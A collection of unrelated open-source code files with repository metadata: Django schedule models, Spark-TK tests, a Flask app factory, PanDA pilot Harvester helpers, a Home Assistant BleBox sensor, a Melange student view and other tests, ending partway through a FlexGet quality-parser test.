schedule = models.ForeignKey(Schedule, related_name='slots')
start_time = models.TimeField()
end_time = models.TimeField()
ref = models.CharField(max_length=255, null=True, blank=True)
def __str__(self):
return '{} - {} ({})'.format(self.start_time, self.end_time, self.schedule)
class Meta:
unique_together = (('schedule', 'start_time', 'end_time'),)
ordering = ('schedule', 'start_time', 'end_time')
@property
def duration(self):
return datetime.combine(self.schedule.day, self.end_time) - datetime.combine(self.schedule.day, self.start_time)
@property
def start_events(self):
return SlotEvent.objects.select_related('location').filter(slot__schedule=self.schedule,
slot__start_time=self.start_time).order_by(
'location__order')
class SlotEvent(models.Model):
""" Glue what with when and where """
slot = models.ForeignKey(ScheduleSlot, related_name='events')
location = models.ForeignKey(Location, null=True, blank=True)
content = models.TextField('Content (EN)', blank=True)
content_fr = models.TextField('Content (FR)', blank=True)
presentation = models.OneToOneField(Presentation, null=True, blank=True)
def __str__(self):
return self.title
class Meta:
unique_together = (
('slot', 'location'),
)
ordering = ('location__order',)
@property
def title(self):
if self.presentation:
return self.presentation.title
return self.content
@property
def is_presentation(self):
return bool(self.presentation)
@property
def duration(self):
return self.slot.duration
@property
def duration_str(self):
return ':'.join(str(self.duration).split(':')[:2])
@property
def presenter(self):
if self.presentation:
return self.presentation.speaker
|
{
"content_hash": "519745c38ca15eab4adc2c4a2e0c555e",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 120,
"avg_line_length": 29.06024096385542,
"alnum_prop": 0.6314262023217247,
"repo_name": "pyconca/2017-web",
"id": "2135402ce3ea9aaa1a977601c1a67f65727cb992",
"size": "4824",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyconca2017/pycon_schedule/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4073"
},
{
"name": "HTML",
"bytes": "123355"
},
{
"name": "JavaScript",
"bytes": "3928"
},
{
"name": "Python",
"bytes": "94813"
},
{
"name": "Shell",
"bytes": "4946"
}
],
"symlink_target": ""
}
|
""" Tests import_csv functionality with varying parameters"""
import unittest
from sparktkregtests.lib import sparktk_test
class FrameCreateTest(sparktk_test.SparkTKTestCase):
def setUp(self):
"""Build frames to be exercised and establish known baselines"""
super(FrameCreateTest, self).setUp()
self.dataset = [["Bob", 30, 8], ["Jim", 45, 9.5], ["Sue", 25, 7], ["George", 15, 6], ["Jennifer", 18, 8.5]]
self.schema = [("C0", str), ("C1", int), ("C2", float)]
self.frame = self.context.frame.create(self.dataset,
schema=self.schema)
def test_frame_invalid_column(self):
"""Tests retrieving an invalid column errors."""
with self.assertRaisesRegexp(Exception, "Invalid column name"):
self.frame.take(100, columns=['not_in'])
def test_frame_create_row_count(self):
""" Trivial Frame creation. """
frame = self.context.frame.create(self.dataset,
schema=self.schema)
self.assertEqual(frame.count(), len(self.dataset))
self.assertEqual(len(frame.take(3)), 3)
# test to see if taking more rows than exist still
# returns only the right number of rows
self.assertEqual(len(frame.take(10)), len(self.dataset))
def test_schema_duplicate_names_diff_type(self):
"""CsvFile creation fails with duplicate names, different type."""
# double num1's same type
bad = [("col1", str), ("col1", int), ("col2", float)]
with self.assertRaisesRegexp(Exception, "Invalid schema"):
self.context.frame.create(self.dataset, schema=bad)
def test_schema_duplicate_names_same_type(self):
"""CsvFile creation fails with duplicate names, same type."""
# two num1's with same type
# note that this should only throw an error because
# the column names are duplicate, not because the
# column types are not valid, the column types being invalid
# should only trigger an exception if validate_schema=True
bad = [("col1", int), ("col1", int), ("col2", int)]
with self.assertRaisesRegexp(Exception, "Invalid schema"):
self.context.frame.create(self.dataset, schema=bad)
def test_schema_invalid_type(self):
"""CsvFile cration with a schema of invalid type fails."""
bad_schema = -77
with self.assertRaisesRegexp(Exception, "Invalid schema"):
self.context.frame.create(self.dataset, schema=bad_schema)
def test_schema_invalid_format(self):
"""CsvFile creation fails with a malformed schema."""
bad_schema = [int, int, float, float, str]
with self.assertRaisesRegexp(Exception, "Invalid schema"):
self.context.frame.create(self.dataset, schema=bad_schema)
def test_without_schema(self):
"""Test import_csv without a specified schema"""
frame = self.context.frame.create(self.dataset)
self.assertEqual(frame.schema, self.schema)
def test_with_validate_schema_no_schema_provided(self):
"""Test import_csv without a specified schema"""
frame = self.context.frame.create(self.dataset, validate_schema=True)
self.assertEqual(frame.schema, self.schema)
def test_with_validate_schema_with_valid_schema(self):
"""Test with validate_schema true and also a valid schema"""
# should default to using the defined schema
frame = self.context.frame.create(self.dataset,
validate_schema=True,
schema=self.schema)
self.assertEqual(frame.schema, self.schema)
def test_validate_schema_with_invalid_schema_all_columns_same_datatype(self):
"""Test with validate_schema=True and invalid schema, columns same type"""
invalid_schema = [("col1", int), ("col2", int), ("col3", int)]
validated_frame = self.context.frame.create(self.dataset,
validate_schema=True,
schema=invalid_schema)
for row in validated_frame.take(validated_frame.count()):
for item in row:
if type(item) is not int:
self.assertEqual(item, None)
def test_validate_schema_with_invalid_schema_col_dif_datatypes(self):
"""Test with validate schema true and column datatypes inconsistent"""
dataset = [(98, 55), (3, 24), ("Bob", 30)]
schema = [("col1", int), ("col2", int)]
frame = self.context.frame.create(dataset,
schema=schema,
validate_schema=True)
for row in frame.take(frame.count()):
for item in row:
if type(item) is not int:
self.assertEqual(item, None)
def test_validate_schema_of_strs(self):
"""Test validate schema true with schema of strs"""
schema = [("C0", str), ("C1", str), ("C2", str)]
# should not throw an exception
# if the datatype can be cast to the schema-specified
# datatype validate schema should just cast it
# since ints and floats can be cast to string
# it should not error but should cast all of the data to strings
frame = self.context.frame.create(self.dataset, schema=schema, validate_schema=True)
for row in frame.take(frame.count()):
# the data should all be cast to str by validate_schema=True
for item in row:
self.assertEqual(type(item), str)
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "d7fae7f8b1630a51a62d66e33dade3e9",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 115,
"avg_line_length": 48.285714285714285,
"alnum_prop": 0.6005917159763313,
"repo_name": "trustedanalytics/spark-tk",
"id": "42bbb10423b22c7c990d514bf3790e2f0ee9d918",
"size": "6451",
"binary": false,
"copies": "13",
"ref": "refs/heads/master",
"path": "regression-tests/sparktkregtests/testcases/frames/frame_create_from_rows_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Java",
"bytes": "31130"
},
{
"name": "Python",
"bytes": "1763489"
},
{
"name": "R",
"bytes": "2242"
},
{
"name": "Scala",
"bytes": "2249490"
},
{
"name": "Shell",
"bytes": "29498"
}
],
"symlink_target": ""
}
|
"""
ListScreen
==========
XML Definition
.. code-block:: xml
<screen name="foo" type="list">
<label>displayed label</label>
</screen>
"""
import logging
from math import floor
from screenflow.screens import Screen
from screenflow.constants import XML_NAME
# Configure logger.
logging.basicConfig()
logger = logging.getLogger(__name__)
class ListScreen(Screen):
"""To document.
"""
#
HORIZONTAL = 0
#
VERTICAL = 1
def __init__(self, name, orientation=ListScreen.VERTICAL):
"""Default constructor.
:param name:
"""
super(MessageScreen, self).__init__(name)
self.orientation = orientation
self.provider = None
self.renderer = None
self._data = None
self._surfaces = []
@property
def data(self):
"""
:returns:
"""
if self._data is None:
if self.provider is None:
raise AttributeError('Data provider not settled')
self._data = self.provider()
return self._data
def provider(self, function):
"""Decorator method that registers the given function as data provider.
:param function: Decorated function to use as data provider.
:returns: Given function to match decorator pattern.
"""
self.provider = function
return function
def renderer(self, function):
"""Decorator method that registers the given function as data renderer.
:param function: Decorated function to use as data renderer.
:returns: Given function to match decorator pattern.
"""
self.renderer = function
return function
def get_item_surface(self, i):
"""
"""
if len(self._surfaces) < i:
self._surfaces[i] = None
if self._surfaces[i] is None:
self._surfaces[i] = None
return self._surfaces[i]
def draw(self, surface):
"""Drawing method, display centered text.
:param surface: Surface to draw this screen into.
"""
super(MessageScreen, self).draw(surface)
# TODO : Draw up scroller.
item_size = None
container_size = None
n = container_size[self.orientation] / item_size[self.orientation]
for i in range(n):
item_surface = get_item_surface(item_size)
self.renderer(None, item_surface)
# TODO : Drawp down scroller.
|
{
"content_hash": "392f7104f5ccaacb97469bab1d43c026",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 79,
"avg_line_length": 25.79381443298969,
"alnum_prop": 0.5831334932054356,
"repo_name": "Faylixe/screenflow",
"id": "2ea9e2eb1bff714a259fa89ee5a2d38f6f760bd8",
"size": "2541",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "screenflow/screens/list_screen.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "71588"
}
],
"symlink_target": ""
}
|
"""The app module, containing the app factory function."""
import os
from flask import Flask, render_template
from colorsearchtest.settings import ProdConfig
from colorsearchtest.assets import assets
from colorsearchtest.extensions import (
cache,
db,
migrate,
debug_toolbar,
)
from colorsearchtest import public
def create_app(config_object=ProdConfig):
"""An application factory, as explained here:
http://flask.pocoo.org/docs/patterns/appfactories/
:param config_object: The configuration object to use.
"""
app = Flask(__name__)
app.config.from_object(config_object)
register_loggers(app)
register_extensions(app)
register_blueprints(app)
register_errorhandlers(app)
return app
def register_extensions(app):
assets.init_app(app)
cache.init_app(app)
db.init_app(app)
debug_toolbar.init_app(app)
migrate.init_app(app, db)
return None
def register_blueprints(app):
app.register_blueprint(public.views.blueprint)
return None
def register_errorhandlers(app):
def render_error(error):
# If a HTTPException, pull the `code` attribute; default to 500
error_code = getattr(error, 'code', 500)
return render_template("{0}.html".format(error_code)), error_code
for errcode in [401, 404, 500]:
app.errorhandler(errcode)(render_error)
return None
def register_loggers(app):
if not app.debug and os.environ.get('HEROKU') is None:
import logging
from logging.handlers import RotatingFileHandler
file_handler = RotatingFileHandler('log/colorsearchtest.log', 'a', 1 * 1024 * 1024, 10)
file_handler.setLevel(logging.INFO)
file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'))
app.logger.addHandler(file_handler)
app.logger.setLevel(logging.INFO)
app.logger.info('colorsearchtest startup')
if os.environ.get('HEROKU') is not None:
import logging
stream_handler = logging.StreamHandler()
app.logger.addHandler(stream_handler)
app.logger.setLevel(logging.INFO)
app.logger.info('colorsearchtest startup')
|
{
"content_hash": "ff637974604f71b27e92582349699f0f",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 123,
"avg_line_length": 30.76388888888889,
"alnum_prop": 0.691196388261851,
"repo_name": "Jaza/colorsearchtest",
"id": "43585caa4d096dd43bea411754e70b7b3097047c",
"size": "2239",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "colorsearchtest/app.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1170"
},
{
"name": "HTML",
"bytes": "25058"
},
{
"name": "JavaScript",
"bytes": "240884"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "59086"
}
],
"symlink_target": ""
}
|
try:
import configparser
except:
import ConfigParser as configparser
def test_config(config):
assert config.templates_dir == '~/.latest/templates/'
assert config.pyexpr_entry == r'\{\$'
assert config.pyexpr_exit == r'\$\}'
assert config.env_entry == r'<<<'
assert config.env_exit == r'>>>'
def test_non_existing_config(non_existing_config):
assert non_existing_config.env_entry == r'\\begin\{latest\}'
|
{
"content_hash": "71316b0abd2d8fc93fbac7b68f8b15ce",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 64,
"avg_line_length": 27.375,
"alnum_prop": 0.6598173515981736,
"repo_name": "bluephlavio/latest",
"id": "917ad5a4421587d45c686ca06a094f7adb6eb3d6",
"size": "438",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20373"
},
{
"name": "TeX",
"bytes": "316"
}
],
"symlink_target": ""
}
|
import os
import os.path
import socket
from pilot.common.exception import FileHandlingFailure
from pilot.util.config import config
from pilot.util.filehandling import write_json, touch, remove, read_json, get_checksum_value
from pilot.util.timing import time_stamp
import logging
logger = logging.getLogger(__name__)
def dump(obj):
"""
function for debugging - dumps object to sysout
"""
for attr in dir(obj):
print("obj.%s = %r" % (attr, getattr(obj, attr)))
def is_harvester_mode(args):
"""
Determine if the pilot is running in Harvester mode.
:param args: Pilot arguments object.
:return: Boolean.
"""
if (args.harvester_workdir != '' or args.harvester_datadir != '') and not args.update_server:
harvester = True
elif (args.harvester_eventstatusdump != '' or args.harvester_workerattributes != '') and not args.update_server:
harvester = True
elif ('HARVESTER_ID' in os.environ or 'HARVESTER_WORKER_ID' in os.environ) and args.harvester_submitmode.lower() == 'push':
harvester = True
else:
harvester = False
return harvester
def get_job_request_file_name():
"""
Return the name of the job request file as defined in the pilot config file.
:return: job request file name.
"""
#logger.debug('config.Harvester.__dict__ : {0}'.format(config.Harvester.__dict__))
return os.path.join(os.environ['PILOT_HOME'], config.Harvester.job_request_file)
def remove_job_request_file():
"""
Remove an old job request file when it is no longer needed.
:return:
"""
path = get_job_request_file_name()
if os.path.exists(path):
if remove(path) == 0:
logger.info('removed %s' % path)
else:
logger.debug('there is no job request file')
def request_new_jobs(njobs=1):
"""
Inform Harvester that the pilot is ready to process new jobs by creating a job request file with the desired
number of jobs.
:param njobs: Number of jobs. Default is 1 since on grids and clouds the pilot does not know how many jobs it can
process before it runs out of time.
:return:
"""
path = get_job_request_file_name()
dictionary = {'nJobs': njobs}
# write it to file
try:
write_json(path, dictionary)
except FileHandlingFailure:
raise FileHandlingFailure
def kill_worker():
"""
Create (touch) a kill_worker file in the pilot launch directory.
This file will let Harverster know that the pilot has finished.
:return:
"""
touch(os.path.join(os.environ['PILOT_HOME'], config.Harvester.kill_worker_file))
def get_initial_work_report():
"""
Prepare the work report dictionary.
Note: the work_report should also contain all fields defined in parse_jobreport_data().
:return: work report dictionary.
"""
work_report = {'jobStatus': 'starting',
'messageLevel': logging.getLevelName(logger.getEffectiveLevel()),
'cpuConversionFactor': 1.0,
'cpuConsumptionTime': '',
'node': socket.gethostname(),
'workdir': '',
'timestamp': time_stamp(),
'endTime': '',
'transExitCode': 0,
'pilotErrorCode': 0, # only add this in case of failure?
}
return work_report
def get_event_status_file(args):
"""
Return the name of the event_status.dump file as defined in the pilot config file
and from the pilot arguments.
:param args: Pilot arguments object.
:return: event staus file name.
"""
logger.debug('config.Harvester.__dict__ : {0}'.format(config.Harvester.__dict__))
if args.harvester_workdir != '':
work_dir = args.harvester_workdir
else:
work_dir = os.environ['PILOT_HOME']
event_status_file = config.Harvester.stageoutnfile
event_status_file = os.path.join(work_dir, event_status_file)
logger.debug('event_status_file = {}'.format(event_status_file))
return event_status_file
def get_worker_attributes_file(args):
"""
Return the name of the worker attributes file as defined in the pilot config file
and from the pilot arguments.
:param args: Pilot arguments object.
:return: worker attributes file name.
"""
logger.debug('config.Harvester.__dict__ : {0}'.format(config.Harvester.__dict__))
if args.harvester_workdir != '':
work_dir = args.harvester_workdir
else:
work_dir = os.environ['PILOT_HOME']
worker_attributes_file = config.Harvester.workerattributesfile
worker_attributes_file = os.path.join(work_dir, worker_attributes_file)
logger.debug('worker_attributes_file = {}'.format(worker_attributes_file))
return worker_attributes_file
def findfile(path, name):
"""
find the first instance of file in the directory tree
:param path: directory tree to search
:param name: name of the file to search
:return: the path to the first instance of the file
"""
for root, dirs, files in os.walk(path):
if name in files:
return os.path.join(root, name)
return ''
def publish_stageout_files(job, event_status_file):
"""
Publishing of work report to file.
The work report dictionary should contain the fields defined in get_initial_work_report().
:param args: Pilot arguments object.
:param job: job object.
:param event status file name:
:return: Boolean. status of writing the file information to a json
"""
# get the harvester workdir from the event_status_file
work_dir = os.path.dirname(event_status_file)
out_file_report = {}
out_file_report[job.jobid] = []
# first look at the logfile information (logdata) from the FileSpec objects
for fspec in job.logdata:
logger.debug("File {} will be checked and declared for stage out".format(fspec.lfn))
# find the first instance of the file
filename = os.path.basename(fspec.surl)
path = findfile(work_dir, filename)
logger.debug("Found File {} at path - {}".format(fspec.lfn, path))
#
file_desc = {}
file_desc['type'] = fspec.filetype
file_desc['path'] = path
file_desc['guid'] = fspec.guid
file_desc['fsize'] = fspec.filesize
file_desc['chksum'] = get_checksum_value(fspec.checksum)
logger.debug("File description - {} ".format(file_desc))
out_file_report[job.jobid].append(file_desc)
# Now look at the output file(s) information (outdata) from the FileSpec objects
for fspec in job.outdata:
logger.debug("File {} will be checked and declared for stage out".format(fspec.lfn))
if fspec.status != 'transferred':
logger.debug('will not add the output file to the json since it was not produced or transferred')
else:
# find the first instance of the file
filename = os.path.basename(fspec.surl)
path = findfile(work_dir, filename)
if not path:
logger.warning('file %s was not found - will not be added to json')
else:
logger.debug("Found File {} at path - {}".format(fspec.lfn, path))
#
file_desc = {}
file_desc['type'] = fspec.filetype
file_desc['path'] = path
file_desc['guid'] = fspec.guid
file_desc['fsize'] = fspec.filesize
file_desc['chksum'] = get_checksum_value(fspec.checksum)
logger.debug("File description - {} ".format(file_desc))
out_file_report[job.jobid].append(file_desc)
if out_file_report[job.jobid]:
if write_json(event_status_file, out_file_report):
logger.debug('Stagout declared in: {0}'.format(event_status_file))
logger.debug('Report for stageout: {}'.format(out_file_report))
return True
else:
logger.debug('Failed to declare stagout in: {0}'.format(event_status_file))
return False
else:
logger.debug('No Report for stageout')
return False
def publish_work_report(work_report=None, worker_attributes_file="worker_attributes.json"):
"""
Publishing of work report to file.
The work report dictionary should contain the fields defined in get_initial_work_report().
:param work_report: work report dictionary.
:param worker_attributes_file:
:raises FileHandlingFailure: in case of IOError.
:return: True or False
"""
if work_report:
try:
work_report['timestamp'] = time_stamp()
if "outputfiles" in work_report:
del(work_report["outputfiles"])
if "inputfiles" in work_report:
del (work_report["inputfiles"])
if "xml" in work_report:
del (work_report["xml"])
if write_json(worker_attributes_file, work_report):
logger.info("work report published: {0}".format(work_report))
return True
else:
logger.error("work report publish failed: {0}".format(work_report))
return False
except IOError:
logger.error("job report copy failed")
return False
except Exception as e:
logger.error("write json file failed: {0}".format(e))
return False
else:
# No work_report return False
return False
def publish_job_report(job, args, job_report_file="jobReport.json"):
"""
Copy job report file to make it accessible by Harvester. Shrink job report file.
:param job: job object.
:param args: Pilot arguments object.
:param job_report_file: name of job report (string).
:raises FileHandlingFailure: in case of IOError.
:return True or False
"""
src_file = os.path.join(job.workdir, job_report_file)
dst_file = os.path.join(args.harvester_workdir, job_report_file)
try:
logger.info(
"copy of payload report [{0}] to access point: {1}".format(job_report_file, args.harvester_workdir))
# shrink jobReport
job_report = read_json(src_file)
if 'executor' in job_report:
for executor in job_report['executor']:
if 'logfileReport' in executor:
executor['logfileReport'] = {}
if write_json(dst_file, job_report):
return True
else:
return False
except IOError:
logger.error("job report copy failed")
return False
def parse_job_definition_file(filename):
"""
This function parses the Harvester job definition file and re-packages the job definition dictionaries.
The format of the Harvester job definition dictionary is:
dict = { job_id: { key: value, .. }, .. }
The function returns a list of these dictionaries each re-packaged as
dict = { key: value } (where the job_id is now one of the key-value pairs: 'jobid': job_id)
:param filename: file name (string).
:return: list of job definition dictionaries.
"""
job_definitions_list = []
# re-package dictionaries
job_definitions_dict = read_json(filename)
if job_definitions_dict:
for job_id in job_definitions_dict:
res = {'jobid': job_id}
res.update(job_definitions_dict[job_id])
job_definitions_list.append(res)
return job_definitions_list
|
{
"content_hash": "12363b6ebcd1f2927c8ebf371688763b",
"timestamp": "",
"source": "github",
"line_count": 345,
"max_line_length": 127,
"avg_line_length": 33.504347826086956,
"alnum_prop": 0.6242754563543559,
"repo_name": "PalNilsson/pilot2",
"id": "643253efba04ca1c6a03bc966b4476a4b7bc9cfa",
"size": "11860",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pilot/util/harvester.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1098187"
},
{
"name": "Shell",
"bytes": "624"
}
],
"symlink_target": ""
}
|
"""Implemented Protocols."""
# relative
from . import beaver
from . import spdz
from .aby3 import ABY3
__all__ = ["beaver", "spdz", "ABY3"]
|
{
"content_hash": "7c2db3da571fe43bcb7088a481679129",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 36,
"avg_line_length": 20.142857142857142,
"alnum_prop": 0.6595744680851063,
"repo_name": "OpenMined/PySyft",
"id": "22b2c3ce6ade1e3a92a6d7fc890d81389d7b4386",
"size": "141",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "packages/syft/src/syft/core/smpc/protocol/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2084"
},
{
"name": "Cap'n Proto",
"bytes": "1377"
},
{
"name": "Dockerfile",
"bytes": "9740"
},
{
"name": "HCL",
"bytes": "4438"
},
{
"name": "JavaScript",
"bytes": "85898"
},
{
"name": "Jupyter Notebook",
"bytes": "33167760"
},
{
"name": "Makefile",
"bytes": "7605"
},
{
"name": "Mako",
"bytes": "510"
},
{
"name": "PowerShell",
"bytes": "161"
},
{
"name": "Python",
"bytes": "3710174"
},
{
"name": "Shell",
"bytes": "52371"
},
{
"name": "TypeScript",
"bytes": "346493"
}
],
"symlink_target": ""
}
|
"""BleBox binary sensor entities."""
from blebox_uniapi.binary_sensor import BinarySensor as BinarySensorFeature
from blebox_uniapi.box import Box
from homeassistant.components.binary_sensor import (
BinarySensorDeviceClass,
BinarySensorEntity,
BinarySensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from . import DOMAIN, PRODUCT, BleBoxEntity
BINARY_SENSOR_TYPES = (
BinarySensorEntityDescription(
key="moisture",
device_class=BinarySensorDeviceClass.MOISTURE,
),
)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up a BleBox entry."""
product: Box = hass.data[DOMAIN][config_entry.entry_id][PRODUCT]
entities = [
BleBoxBinarySensorEntity(feature, description)
for feature in product.features.get("binary_sensors", [])
for description in BINARY_SENSOR_TYPES
if description.key == feature.device_class
]
async_add_entities(entities, True)
class BleBoxBinarySensorEntity(BleBoxEntity[BinarySensorFeature], BinarySensorEntity):
"""Representation of a BleBox binary sensor feature."""
def __init__(
self, feature: BinarySensorFeature, description: BinarySensorEntityDescription
) -> None:
"""Initialize a BleBox binary sensor feature."""
super().__init__(feature)
self.entity_description = description
@property
def is_on(self) -> bool:
"""Return the state."""
return self._feature.state
|
{
"content_hash": "f80d69346933217ae34bc02a157716a4",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 86,
"avg_line_length": 30.87272727272727,
"alnum_prop": 0.7179034157832744,
"repo_name": "mezz64/home-assistant",
"id": "7eb6fd1e5a28fcce44e9457eb4a91a515527c498",
"size": "1698",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "homeassistant/components/blebox/binary_sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "52481895"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
}
|
"""Views for GSoCStudent.
"""
__authors__ = [
'"Daniel Hans" <daniel.m.hans@gmail.com>',
'"Sverre Rabbelier" <sverre@rabbelier.nl>',
]
from django import forms
from django.utils.translation import ugettext
from soc.logic import cleaning
from soc.logic import dicts
from soc.views import out_of_band
from soc.views.helper import decorators
from soc.views.helper import redirects
from soc.views.helper import responses
from soc.views.models import student
from soc.logic.models.user import logic as user_logic
from soc.modules.gsoc.logic.models.program import logic as program_logic
from soc.modules.gsoc.logic.models.student import logic as student_logic
from soc.modules.gsoc.logic.models.mentor import logic as mentor_logic
from soc.modules.gsoc.logic.models.org_admin import logic as org_admin_logic
from soc.modules.gsoc.views.helper import access
from soc.modules.gsoc.views.models import program as program_view
class View(student.View):
"""View methods for the Student model.
"""
DEF_STUDENT_PROJECTS_MSG_FMT = ugettext("List of my Student Projects "
" for %(name)s")
def __init__(self, params=None):
"""Defines the fields and methods required for the base View class
to provide the user with list, public, create, edit and delete views.
Params:
params: a dict with params for this View
"""
rights = access.GSoCChecker(params)
rights['create'] = ['checkIsDeveloper']
rights['edit'] = [('checkIsMyActiveRole', student_logic)]
rights['delete'] = ['checkIsDeveloper']
rights['apply'] = [
'checkIsUser',
('checkIsActivePeriod',
['student_signup', 'scope_path', program_logic]),
('checkIsNotParticipatingInProgramInScope', [program_logic,
student_logic, org_admin_logic, mentor_logic]),
]
rights['manage'] = [('checkIsMyActiveRole', student_logic)]
rights['list_projects'] = [
('checkHasRoleForScope', [student_logic, ['active', 'inactive']]),
('checkIsAfterEvent', ['accepted_students_announced_deadline',
'scope_path', program_logic])]
new_params = {}
new_params['logic'] = student_logic
new_params['rights'] = rights
new_params['group_logic'] = program_logic
new_params['group_view'] = program_view.view
new_params['scope_view'] = program_view
new_params['name'] = "GSoC Student"
new_params['module_name'] = "student"
new_params['sidebar_grouping'] = 'Students'
new_params['module_package'] = 'soc.modules.gsoc.views.models'
new_params['url_name'] = 'gsoc/student'
patterns = [
(r'^%(url_name)s/(?P<access_type>list_projects)/%(scope)s$',
'%(module_package)s.%(module_name)s.list_projects',
'List of my Student Projects')]
new_params['extra_django_patterns'] = patterns
params = dicts.merge(params, new_params, sub_merge=True)
super(View, self).__init__(params=params)
@decorators.merge_params
@decorators.check_access
def listProjects(self, request, access_type,
page_name=None, params=None, **kwargs):
"""View that lists all of the current user's Student Projects for the
Program given as Scope.
"""
from soc.modules.gsoc.views.models import student_project as project_view
user_entity = user_logic.getCurrentUser()
# pylint: disable=E1103
fields = {
'link_id': user_entity.link_id,
'scope_path': kwargs['scope_path']
}
try:
student_entity = student_logic.getFromKeyFieldsOr404(fields)
except out_of_band.Error, error:
return responses.errorResponse(
error, request, template=params['error_public'])
# set the fields we need for the Student Project list
fields = {'student': student_entity}
list_params = project_view.view.getParams().copy()
fmt = {'name': student_entity.scope.name}
list_params['list_description'] = self.DEF_STUDENT_PROJECTS_MSG_FMT % fmt
list_params['public_row_extra'] = lambda entity: {
'link': (redirects.getStudentEditRedirect(entity, list_params) if
entity.student.status != 'inactive' else
redirects.getPublicRedirect(entity, list_params))
}
return project_view.view.list(request, 'allow', page_name=page_name,
params=list_params, filter=fields)
view = View()
apply = decorators.view(view.apply)
create = decorators.view(view.create)
delete = decorators.view(view.delete)
edit = decorators.view(view.edit)
list = decorators.view(view.list)
list_projects = decorators.view(view.listProjects)
manage = decorators.view(view.manage)
public = decorators.view(view.public)
export = decorators.view(view.export)
|
{
"content_hash": "3ff13219b7fc1b032917d9cc0dae461e",
"timestamp": "",
"source": "github",
"line_count": 140,
"max_line_length": 77,
"avg_line_length": 33.82857142857143,
"alnum_prop": 0.676731418918919,
"repo_name": "SRabbelier/Melange",
"id": "a89feabf4435be9cccb81cb5d5876239a161531a",
"size": "5346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/soc/modules/gsoc/views/models/student.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "400472"
},
{
"name": "C++",
"bytes": "20"
},
{
"name": "Java",
"bytes": "1496"
},
{
"name": "JavaScript",
"bytes": "1623582"
},
{
"name": "PHP",
"bytes": "1032"
},
{
"name": "Perl",
"bytes": "177565"
},
{
"name": "Python",
"bytes": "15317793"
},
{
"name": "Ruby",
"bytes": "59"
},
{
"name": "Shell",
"bytes": "15303"
}
],
"symlink_target": ""
}
|
import antlr3
import testbase
import unittest
class t016actions(testbase.ANTLRTest):
def setUp(self):
self.compileGrammar()
def testValid(self):
cStream = antlr3.StringStream("int foo;")
lexer = self.getLexer(cStream)
tStream = antlr3.CommonTokenStream(lexer)
parser = self.getParser(tStream)
name = parser.declaration()
self.assertEqual(name, 'foo')
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "c94a38c238a33761e719294401b792be",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 49,
"avg_line_length": 24.75,
"alnum_prop": 0.6060606060606061,
"repo_name": "pballand/congress",
"id": "60ea53ac409c5fa4c96dc8718df032cb52412e1d",
"size": "495",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "thirdparty/antlr3-antlr-3.5/runtime/Python3/tests/t016actions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "213793"
},
{
"name": "Shell",
"bytes": "2488"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
import pytest
from jinja2 import Template
from flexget.plugins.parsers.parser_guessit import ParserGuessit
from flexget.plugins.parsers.parser_internal import ParserInternal
from flexget.utils.qualities import Quality
class TestQualityModule(object):
def test_get(self):
assert not Quality(), 'unknown quality is not false'
assert Quality('foobar') == Quality(), 'unknown not returned'
def test_common_name(self):
for test_val in ('720p', '1280x720'):
got_val = Quality(test_val).name
assert got_val == '720p', got_val
class TestQualityParser(object):
@pytest.fixture(scope='class', params=['internal', 'guessit'], ids=['internal', 'guessit'], autouse=True)
def parser(self, request):
if request.param == 'internal':
return ParserInternal
if request.param == 'guessit':
return ParserGuessit
@pytest.mark.parametrize("test_quality", [
('Test.File 1080p.web', '1080p webdl'),
('Test.File.2160p.web', '2160p webdl'),
('Test.File.1080.web-random', '1080p webdl'),
('Test.File.1080.webrandom', '1080p'),
('Test.File 1080p.web-dl', '1080p webdl'),
('Test.File.web-dl.1080p', '1080p webdl'),
('Test.File.WebHD.720p', '720p webdl'),
('Test.File.720p.bluray', '720p bluray'),
('Test.File.720hd.bluray', '720p bluray'),
('Test.File.1080p.bluray', '1080p bluray'),
